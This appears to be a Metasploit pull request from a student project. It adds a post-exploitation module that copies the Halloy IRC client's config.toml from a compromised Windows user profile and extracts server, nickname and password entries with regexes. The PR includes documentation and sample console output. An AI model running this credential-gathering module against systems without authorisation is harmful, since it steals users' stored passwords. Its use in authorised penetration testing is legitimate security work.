### PR TITLE
Add Halloy IRC PackRat module

### DIFF
--- a/documentation/modules/post/windows/gather/credentials/halloy_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/halloy_irc.md
@@ -35,7 +35,7 @@ This option is turned on by default and will perform the data extraction using t
 regular expression. The 'Store loot' options must be turned on in order for this to take work.
 
 ## Scenarios
-### Default Output
+### Halloy v2024.6 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
 ```
 msf6 post(windows/gather/credentials/halloy_irc) > run
 
@@ -58,7 +58,7 @@ msf6 post(windows/gather/credentials/halloy_irc) > run
 
 ```
 
-### Verbose Output
+### Halloy v2024.6 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
 ```
 
 msf6 post(windows/gather/credentials/halloy_irc_v2) > run

--- a/documentation/modules/post/windows/gather/credentials/halloy_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/halloy_irc.md
@@ -1,0 +1,93 @@
+## Vulnerable Application
+
+  This post-exploitation module extracts clear text credentials from the Halloy IRC Client.
+
+  The Halloy IRC Client is avaialble from (https://github.com/squidowl/halloy).
+
+  This module extracts information from the config.toml file in the "AppData\Roaming\Halloy" directory.
+
+  This module extracts server information such as server, port, nickname, password and proxy password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/halloy_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Default Output
+```
+msf6 post(windows/gather/credentials/halloy_irc_v2) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Halloy irc's Config.toml file found
+[*] Downloading C:\Users\test\AppData\Roaming\halloy\config.toml
+[*] Halloy irc Config.toml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_HalloyIRCconfig_968975.toml
+
+[+] server="irc.libera.chat"
+[+] port=6697
+[+] nickname="halloy4169"
+[+] File with data saved:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_EXTRACTIONconfig_815098.toml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Verbose Output
+```
+
+msf6 post(windows/gather/credentials/halloy_irc_v2) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Halloy irc's base folder not found in users's user directory
+
+[*] Starting Packrat...
+[*] Halloy irc's base folder found
+[*] Found the folder containing specified artifact for config.toml.
+[*] Halloy irc's Config.toml file found
+[*] Processing C:\Users\test\AppData\Roaming\halloy
+[*] Downloading C:\Users\test\AppData\Roaming\halloy\config.toml
+[*] Halloy irc Config.toml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507145656_default_10.0.0.2_HalloyIRCconfig_292638.toml
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] server="irc.libera.chat"
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] port=6697
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] nickname="halloy4169"
+[+] File with data saved:  /home/kali/.msf4/loot/20240507145656_default_10.0.0.2_EXTRACTIONconfig_238220.toml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```

--- a/documentation/modules/post/windows/gather/credentials/halloy_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/halloy_irc.md
@@ -1,12 +1,12 @@
 ## Vulnerable Application
 
-  This post-exploitation module extracts clear text credentials from the Halloy IRC Client.
+This post-exploitation module extracts clear text credentials from the Halloy IRC Client.
 
-  The Halloy IRC Client is avaialble from (https://github.com/squidowl/halloy).
+The Halloy IRC Client is avaialble from (https://github.com/squidowl/halloy).
 
-  This module extracts information from the config.toml file in the "AppData\Roaming\Halloy" directory.
+This module extracts information from the config.toml file in the "AppData\Roaming\Halloy" directory.
 
-  This module extracts server information such as server, port, nickname, password and proxy password.
+This module extracts server information such as server, port, nickname, password and proxy password.
 
 
 ## Verification Steps

--- a/documentation/modules/post/windows/gather/credentials/halloy_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/halloy_irc.md
@@ -37,7 +37,7 @@ regular expression. The 'Store loot' options must be turned on in order for this
 ## Scenarios
 ### Default Output
 ```
-msf6 post(windows/gather/credentials/halloy_irc_v2) > run
+msf6 post(windows/gather/credentials/halloy_irc) > run
 
 [*] Filtering based on these selections:  
 [*] ARTIFACTS: All

--- a/modules/post/windows/gather/credentials/halloy_irc.rb
+++ b/modules/post/windows/gather/credentials/halloy_irc.rb
@@ -1,0 +1,95 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  # this associative array defines the artifacts known to PackRat
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+  include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'Halloy IRC',
+      app_category: 'IRC',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'halloy',
+          artifact_file_name: 'config.toml',
+          description: "Saved Bookmarks",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:server =.*)',
+                '(?i-mx:port =.*)',
+                '(?i-mx:nickname =.*)',
+                '(?i-mx:password =.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Halloy IRC credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for credentials stored on Halloy IRC Client in a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Kazuyoshi Maruta',
+          'Daniel Hallsworth',
+          'Barwar Salim M',
+          'Jacob Tierney',
+          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+        ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        # OptRegexp.new('REGEX', [false, 'Match a regular expression', '^secret']),
+        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
+        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
+        # enumerates the options based on the artifacts that are defined below
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
+      ]
+    )
+  end
+
+  def run
+    print_status('Filtering based on these selections:  ')
+    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
+    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
+    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
+
+    # used to grab files for each user on the remote host
+    grab_user_profiles.each do |userprofile|
+      run_packrat(userprofile, ARTIFACTS)
+  end
+
+    print_status 'PackRat credential sweep Completed'
+end
+end

--- a/modules/post/windows/gather/credentials/halloy_irc.rb
+++ b/modules/post/windows/gather/credentials/halloy_irc.rb
@@ -66,7 +66,6 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        # OptRegexp.new('REGEX', [false, 'Match a regular expression', '^secret']),
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below

--- a/modules/post/windows/gather/credentials/halloy_irc.rb
+++ b/modules/post/windows/gather/credentials/halloy_irc.rb
@@ -48,10 +48,10 @@ class MetasploitModule < Msf::Post
         },
         'License' => MSF_LICENSE,
         'Author' => [
+          'Jacob Tierney',
           'Kazuyoshi Maruta',
           'Daniel Hallsworth',
           'Barwar Salim M',
-          'Jacob Tierney',
           'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
         ],
         'Platform' => ['win'],

--- a/modules/post/windows/gather/credentials/halloy_irc.rb
+++ b/modules/post/windows/gather/credentials/halloy_irc.rb
@@ -69,11 +69,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
-                                                          k[:filetypes]
-                                                        end.uniq.unshift('All')
-        ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/halloy_irc.rb
+++ b/modules/post/windows/gather/credentials/halloy_irc.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Post
           path: 'AppData',
           dir: 'halloy',
           artifact_file_name: 'config.toml',
-          description: "Saved Bookmarks",
+          description: 'Saved Bookmarks',
           credential_type: 'text',
           regex_search: [
             {
@@ -88,8 +88,8 @@ class MetasploitModule < Msf::Post
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
       run_packrat(userprofile, ARTIFACTS)
-  end
+    end
 
     print_status 'PackRat credential sweep Completed'
-end
+  end
 end


### PR DESCRIPTION
As A part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new `/post/windows/gather/credentials` module for the Halloy IRC Client. [https://github.com/squidowl/halloy](url)

This pull request will add two files:
1. modules/post/windows/gather/credentials/halloy_irc.rb
2. documentation/modules/post/windows/gather/credentials/halloy_irc.md


## Verification

1. Start `msfconsole`
2.  Get a Meterpreter session on a Windows system
3. `use post/windows/gather/credentials/halloy_irc`
4. `Set SESSION 1`
5. `run`
## Scenario
Using Halloy v2024.6 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045
```
msf6 post(windows/gather/credentials/halloy_irc) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Halloy irc's Config.toml file found
[*] Downloading C:\Users\test\AppData\Roaming\halloy\config.toml
[*] Halloy irc Config.toml downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_HalloyIRCconfig_968975.toml

[+] server="irc.libera.chat"
[+] port=6697
[+] nickname="halloy4169"
[+] File with data saved:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_EXTRACTIONconfig_815098.toml
[*] PackRat credential sweep Completed
[*] Post module execution completed
```